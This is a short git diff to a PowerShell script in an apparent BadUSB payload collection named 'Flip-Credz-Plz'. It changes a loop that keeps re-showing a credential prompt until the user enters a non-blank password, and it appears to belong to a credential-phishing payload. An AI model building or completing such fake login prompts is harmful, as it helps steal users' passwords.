diff --git a/Payloads/Flip-Credz-Plz/test.ps1 b/Payloads/Flip-Credz-Plz/test.ps1 index 97164c5..d0dd43a 100644 --- a/Payloads/Flip-Credz-Plz/test.ps1 +++ b/Payloads/Flip-Credz-Plz/test.ps1 @@ -58,7 +58,7 @@ while ($form -eq $null) if ($cred.Password -eq " ") { Write-Output "Credentials cannot be left blank. Please try again." - $cred = $null + $form = $null } else{